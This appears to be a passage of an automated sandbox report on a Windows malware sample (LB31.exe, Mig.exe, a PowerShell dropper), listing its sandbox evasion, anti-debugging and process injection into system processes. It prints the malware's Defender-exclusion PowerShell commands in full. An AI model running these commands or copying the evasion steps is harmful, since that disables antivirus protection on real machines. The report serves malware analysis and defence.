        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Contains functionality to compare user and computer (likely to detect sandboxes)
        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,29_2_00000001400010C0
        Tries to evade debugger and weak emulator (self modifying code)
        Source: C:\Users\user\AppData\Roaming\LB31.exeSpecial instruction interceptor: First address: 7FF7E78F6D85 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Roaming\LB31.exeSpecial instruction interceptor: First address: 7FF7E75BD3D8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\Mig\Mig.exeSpecial instruction interceptor: First address: 7FF6FDA96D85 instructions caused by: Self-modifying code
        Source: C:\ProgramData\Mig\Mig.exeSpecial instruction interceptor: First address: 7FF6FD75D3D8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
        Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
        Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4497Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5126Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7245Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2455Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6290Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2267Jump to behavior
        Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1424
        Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 451
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4861
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5138
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 6422
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 3459
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9869
        Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_43-14920
        Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_42-14741
        Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_35-14817
        Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_29-409
        Source: C:\Windows\System32\lsass.exeAPI coverage: 7.7 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.6 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.7 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936Thread sleep time: -10145709240540247s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1636Thread sleep count: 7245 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 2455 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 6290 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6132Thread sleep count: 2267 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 4232Thread sleep count: 1424 > 30
        Source: C:\Windows\System32\dialer.exe TID: 4232Thread sleep time: -142400s >= -30000s
        Source: C:\Windows\System32\dialer.exe TID: 7412Thread sleep count: 451 > 30
        Source: C:\Windows\System32\dialer.exe TID: 7412Thread sleep time: -45100s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 5084Thread sleep count: 4861 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 5084Thread sleep time: -4861000s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 5084Thread sleep count: 5138 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 5084Thread sleep time: -5138000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 2712Thread sleep count: 6422 > 30
        Source: C:\Windows\System32\lsass.exe TID: 2712Thread sleep time: -6422000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 2712Thread sleep count: 3459 > 30
        Source: C:\Windows\System32\lsass.exe TID: 2712Thread sleep time: -3459000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6040Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6040Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 5256Thread sleep count: 9869 > 30
        Source: C:\Windows\System32\dwm.exe TID: 5256Thread sleep time: -9869000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5888Thread sleep count: 102 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5888Thread sleep time: -102000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3820Thread sleep count: 99 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3820Thread sleep time: -99000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6096Thread sleep count: 99 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6096Thread sleep time: -99000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3944Thread sleep count: 249 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3944Thread sleep time: -249000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6960Thread sleep count: 199 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6960Thread sleep time: -199000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6124Thread sleep count: 84 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6124Thread sleep time: -84000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3976Thread sleep count: 132 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3976Thread sleep time: -132000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5924Thread sleep count: 134 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5924Thread sleep time: -134000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6328Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6328Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5268Thread sleep count: 241 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5268Thread sleep time: -241000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5512Thread sleep count: 247 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5512Thread sleep time: -247000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5456Thread sleep count: 247 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5456Thread sleep time: -247000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5548Thread sleep count: 113 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5548Thread sleep time: -113000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5320Thread sleep count: 113 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5320Thread sleep time: -113000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5408Thread sleep count: 72 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5408Thread sleep time: -72000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5656Thread sleep count: 72 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5656Thread sleep time: -72000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC6038DCE0 FindFirstFileExW,35_2_000001FC6038DCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C737DCE0 FindFirstFileExW,41_2_00000161C737DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91EDCE0 FindFirstFileExW,42_2_00000233B91EDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918EDCE0 FindFirstFileExW,43_2_00000210918EDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E99DCE0 FindFirstFileExW,44_2_000002062E99DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DADCE0 FindFirstFileExW,45_2_00000282B8DADCE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000001.00000002.1700658744.0000014FBB907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_29-477
        Source: C:\Users\user\AppData\Roaming\LB31.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (window names)
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: regmonclass
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: procmon_window_class
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: filemonclass
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess queried: DebugPortJump to behavior
        Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugPort
        Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugObjectHandle
        Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugPort
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC6038D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_000001FC6038D2A4
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,29_2_00000001400017EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC6038D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_000001FC6038D2A4
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC60387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_000001FC60387D90
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C737D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000161C737D2A4
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C7377D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000161C7377D90
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000233B91E7D90
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000233B91ED2A4
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00000210918E7D90
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00000210918ED2A4
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E997D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_000002062E997D90
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E99D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_000002062E99D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00000282B8DAD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00000282B8DA7D90

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: 1.png.ps1, type: SAMPLE
        Source: Yara matchFile source: amsi64_8076.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8076, type: MEMORYSTR
        Adds a directory exclusion to Windows Defender
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Allocates memory in foreign processes
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 161C7340000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 233B91B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 21091CF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2062E960000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 282B8D70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22856DC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18F9CCD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207BAC00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16F9C9D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27A01800000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2992B230000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23227590000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28098F60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23ACD780000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BBD2B80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F1C1330000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 192A4090000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F8F61C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5112C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2848B1D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A12F60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D8115C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C8B4690000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 213C6680000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: B80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25B905C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2905A8E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BADC5B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A5FA180000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19296180000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24ED0B50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20955320000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B054660000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15D00D80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20983090000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 278CACC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13AD1CA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DAE2270000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1FD1BED0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 284FF340000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22687920000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CCCCC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B661F20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 281EEB30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD637D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 89B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2081CC80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23263180000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2064B670000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A0E5E00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1F535400000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A2C40A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 149A8F80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115790000 protect: page execute and read and write
